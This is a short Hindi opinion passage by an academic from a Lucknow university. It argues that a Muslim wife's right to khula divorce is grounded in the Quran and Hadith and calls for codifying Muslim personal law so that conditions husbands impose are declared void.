विभिन्न शोधों से पता चलता है कि पति अपनी सहमति देने से पहले अनुचित शर्तें लगा रहा है जो कि खुला के कुरानिक कानून के खिलाफ हैं। यह विचार कि एक मुस्लिम पत्नी को पति से तलाक लेने का कोई पूर्ण अधिकार नहीं है, कुरान और हदीस द्वारा समर्थित नहीं है। कुरान और हदीस द्वारा मान्यता प्राप्त मुस्लिम महिलाओं के इस पूर्ण अधिकार की पुनर्व्याख्या करने की आवश्यकता है। खुला के इस पूर्ण अधिकार को तलाक के कानूनी आधार के रूप में कानून में शामिल किया जाना चाहिए और पति द्वारा लगाई गई सभी शर्तों को अमान्य घोषित किया जाना चाहिए। लैंगिक न्याय सुनिश्चित करने के साथ-साथ मुस्लिम महिलाओं की गरिमा के साथ समानता और जीवन के अधिकार के संवैधानिक रूप से गारंटीकृत अधिकार को सुनिश्चित करने के लिए मुस्लिम पर्सनल लॉ का संहिताकरण समय की आवश्यकता है।
डॉक्टर सूफिया अहमद
बाबा साहब भीमराव अम्बेडकर विश्विद्यालय लखनऊ

LEAVE A REPLY

Please enter your comment!
Please enter your name here